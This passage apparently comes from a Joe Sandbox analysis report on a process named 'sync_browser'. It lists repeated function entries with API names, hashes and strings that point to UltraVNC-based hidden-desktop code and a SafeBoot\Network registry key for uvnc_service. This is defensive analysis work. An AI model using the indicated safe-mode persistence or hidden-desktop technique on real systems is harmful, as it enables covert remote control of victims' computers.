                                                                                          • Instruction Fuzzy Hash: EF016572A28B8186EB508F11F48475AB768FB94788F400231FA8D46BA8DF3CD148CB00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValue
                                                                                          • String ID: System\CurrentControlSet\Control\Terminal Server$TSAppCompat
                                                                                          • API String ID: 3677997916-252502655
                                                                                          • Opcode ID: 04d61c28986da10210dbcfa3cf5e3dc0138d519c330a05b731dc0905639135b6
                                                                                          • Instruction ID: 96608f923f22eb5780a137447c927af7232509fd7271b0a5f9d7f7a6db08f6c2
                                                                                          • Opcode Fuzzy Hash: 04d61c28986da10210dbcfa3cf5e3dc0138d519c330a05b731dc0905639135b6
                                                                                          • Instruction Fuzzy Hash: 6E016572A28B8286EF508B51F48475AB768FB94798F400131F68D46A68DF7CD158CF00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseOpenValue
                                                                                          • String ID: Control Panel\Desktop$WallpaperStyle
                                                                                          • API String ID: 779948276-747434185
                                                                                          • Opcode ID: 86799752d3e54857d2eafa99cacc6ace5413f974bbce5436984941c6bb35b0a9
                                                                                          • Instruction ID: 908bc1b2e037b6b32105da6a5507f2563bf718adbddce9fad7e2f1f51ef26235
                                                                                          • Opcode Fuzzy Hash: 86799752d3e54857d2eafa99cacc6ace5413f974bbce5436984941c6bb35b0a9
                                                                                          • Instruction Fuzzy Hash: E9016736B28A4182E7108B14F844556B3A4FB957A4F405331FA7D83BE8DF2DD509CB00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValue
                                                                                          • String ID: Control Panel\Desktop$WallpaperStyle
                                                                                          • API String ID: 3677997916-747434185
                                                                                          • Opcode ID: 8f2748f2ab4e4755b02a530358349d128b83dd3c8b3fdf60e15f7253ce60a2a6
                                                                                          • Instruction ID: 252b710e8684d60eeaa7c3ecb79fab1bf1cab119c78c05f30c2633290be38b63
                                                                                          • Opcode Fuzzy Hash: 8f2748f2ab4e4755b02a530358349d128b83dd3c8b3fdf60e15f7253ce60a2a6
                                                                                          • Instruction Fuzzy Hash: DDF04436A18B4281EB108B14F454656B778FB95749F900231FA4D47B78DF3DD11ECB00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Delete_errno_invalid_parameter_noinfo_snprintf
                                                                                          • String ID: Network$SYSTEM\CurrentControlSet\Control\SafeBoot\%s\%s$uvnc_service
                                                                                          • API String ID: 1597899911-1199838351
                                                                                          • Opcode ID: 446da7c11d9b0ffc6a81d4342d0f74e20c69771809681aa75ea43c0afc302851
                                                                                          • Instruction ID: ccebc45ead6d6feb1fc7f9a4e4e4f4a671980ca365e4de213215a6003e9c989d
                                                                                          • Opcode Fuzzy Hash: 446da7c11d9b0ffc6a81d4342d0f74e20c69771809681aa75ea43c0afc302851
                                                                                          • Instruction Fuzzy Hash: 1FF0B462B38E4281EA109720F4553AAA360FB94318FC01236F65D837E8CF3CD11DC744
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FlushObjectSelect
                                                                                          • String ID:
                                                                                          • API String ID: 2071645339-0
                                                                                          • Opcode ID: aae6b1b2f4783f6f5e23d49270f9574a5a39ea57b095736f451dd763dd412b48
                                                                                          • Instruction ID: cc1cbd496d44bbe54645920592211d0da111ec036ee64956e691f27a5852b453
                                                                                          • Opcode Fuzzy Hash: aae6b1b2f4783f6f5e23d49270f9574a5a39ea57b095736f451dd763dd412b48
                                                                                          • Instruction Fuzzy Hash: B8516F73A2C6818AF7609F25E4047AA7B90FB95B89F180136FA5D87755CE3CE44ACB00
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _lock$_errno_getptd_invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 2808128820-0
                                                                                          • Opcode ID: 293906f060d6459fee2b9c3bdc37a31292350123b62cfc1943e27c937da36d0d
                                                                                          • Instruction ID: 777debc2331435e82686b26d7309121d471ad8644dea6feec382281b8bb036e6
                                                                                          • Opcode Fuzzy Hash: 293906f060d6459fee2b9c3bdc37a31292350123b62cfc1943e27c937da36d0d
                                                                                          • Instruction Fuzzy Hash: 2E419A23B3964281FB15AB61A9003BAAA91FF69BD4F440235FD4DD77E6DF2DA409C700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$StringTypefreemalloc
                                                                                          • String ID:
                                                                                          • API String ID: 307345228-0
                                                                                          • Opcode ID: 1b990316f8ee8c74eb84edbc338ace2982aad15001b0fddeae94aa45b172380f
                                                                                          • Instruction ID: 1ec280410e9edc40b973e1a4c23a28fbbc63f67107582604c1f5816a988206bf
                                                                                          • Opcode Fuzzy Hash: 1b990316f8ee8c74eb84edbc338ace2982aad15001b0fddeae94aa45b172380f
                                                                                          • Instruction Fuzzy Hash: CE415F73A34A818AEB619F2598005A9A2D5FF64BA8F584735FE2D877D5DF3CE4098300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalEnterSectionclosesocketshutdown
                                                                                          • String ID: c$vncclient.cpp : enable update thread$vncclient.cpp : enable/disable synced$vncclient.cpp : protocol enabled too many times!
                                                                                          • API String ID: 3339156387-1190838069
                                                                                          • Opcode ID: ef05844faa1cd020fc3eb9c414a04fab55e6cb55e3cee0b01a28a687e8f68859
                                                                                          • Instruction ID: e83a2ed9e4e74618df5af38952e3b1d6e99e7799517877bf08848652f12ab178
                                                                                          • Opcode Fuzzy Hash: ef05844faa1cd020fc3eb9c414a04fab55e6cb55e3cee0b01a28a687e8f68859
                                                                                          • Instruction Fuzzy Hash: 7F214F63A28E8281E750DF29D8442F96369FBA8B94F544231E95EC72E5DF3CD549C310
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                          • String ID:
                                                                                          • API String ID: 1445889803-0
                                                                                          • Opcode ID: 5fd10cac5a6f9bb249cac31feee61d70b85b460cd106259e4606b4f7c020a879
                                                                                          • Instruction ID: 76c7427c0318a5ea4533835c74d56124482f0135262efe0cbc7d9964820b1c48
                                                                                          • Opcode Fuzzy Hash: 5fd10cac5a6f9bb249cac31feee61d70b85b460cd106259e4606b4f7c020a879
                                                                                          • Instruction Fuzzy Hash: D4016122B79A0182EB809F25F844265A364FB69B90F446630FE5E877E4DE3CD88D8300
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: __doserrno_errno
                                                                                          • String ID:
                                                                                          • API String ID: 921712934-0
                                                                                          • Opcode ID: d406b4a9bfd038921951594095831198988d57d612f0112f0ddf710c3ea7d616
                                                                                          • Instruction ID: 3abbf1d4bc4cd0b289ab9c07c353a863f4aa0469ed54f4c175030c83e1fcd85b
                                                                                          • Opcode Fuzzy Hash: d406b4a9bfd038921951594095831198988d57d612f0112f0ddf710c3ea7d616
                                                                                          • Instruction Fuzzy Hash: FC018163F3964646FA156BD5884137CA152AFB1BB2F514332F53D863E2CE6C6418C620
                                                                                          APIs
                                                                                          • LoadCursorA.USER32 ref: 00007FF67E7F0925
                                                                                            • Part of subcall function 00007FF67E7ED930: InitializeCriticalSection.KERNEL32 ref: 00007FF67E7ED95E
                                                                                            • Part of subcall function 00007FF67E7ED930: InitializeCriticalSection.KERNEL32 ref: 00007FF67E7ED9EB
                                                                                            • Part of subcall function 00007FF67E7ED930: LoadLibraryA.KERNEL32 ref: 00007FF67E7EDA0D
                                                                                            • Part of subcall function 00007FF67E7ED930: GetProcAddress.KERNEL32 ref: 00007FF67E7EDA30
                                                                                            • Part of subcall function 00007FF67E7ED930: LoadLibraryA.KERNEL32 ref: 00007FF67E7EDA51
                                                                                            • Part of subcall function 00007FF67E7ED930: GetProcAddress.KERNEL32 ref: 00007FF67E7EDA6D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Load$AddressCriticalInitializeLibraryProcSection$Cursormalloc
                                                                                          • String ID: vncDesktopSW.cpp : SWinit $vncdesktop.cpp : failed to start hook thread$vncdesktop.cpp : initialising desktop handler
                                                                                          • API String ID: 2513085289-3031267129
                                                                                          • Opcode ID: 1873326b8f4cfb085588ecdcb6f02ef7e0e864c911988560d8123a10f1f5999c
                                                                                          • Instruction ID: 460c7d5bc55520ec72d96e413978c40d133c91d589c0a170d4223a9cb6a01770
                                                                                          • Opcode Fuzzy Hash: 1873326b8f4cfb085588ecdcb6f02ef7e0e864c911988560d8123a10f1f5999c
                                                                                          • Instruction Fuzzy Hash: 19218636629BC192F608CB60E5441E9B3A8FB54B50F544636E7AD97795DF3CE069C300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DesktopInputOpen
                                                                                          • String ID: Default
                                                                                          • API String ID: 601053899-753088835
                                                                                          • Opcode ID: 70adbaaf15933b6300e773d9a6368acce56cf68ba5067fbfdfb46543feca4f4b
                                                                                          • Instruction ID: cd5f6c3f6b0dd26f6af2da52317e98fab472a14e3393cfa286c27bb3ca32af1d
                                                                                          • Opcode Fuzzy Hash: 70adbaaf15933b6300e773d9a6368acce56cf68ba5067fbfdfb46543feca4f4b
                                                                                          • Instruction Fuzzy Hash: B4218136B2C68281E721DB15B4153FAA395FFA9754F840431EA9E87795DF2CD018CB00
                                                                                          APIs
                                                                                          Strings
                                                                                          • HideDesktop.cpp : Failed to restore SPI value for 0x%04x (0x%08x), xrefs: 00007FF67E7CA89F
                                                                                          • HideDesktop.cpp : Restored SPI value for 0x%04x to 0x%08x, xrefs: 00007FF67E7CA8B0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorInfoLastParametersSystem
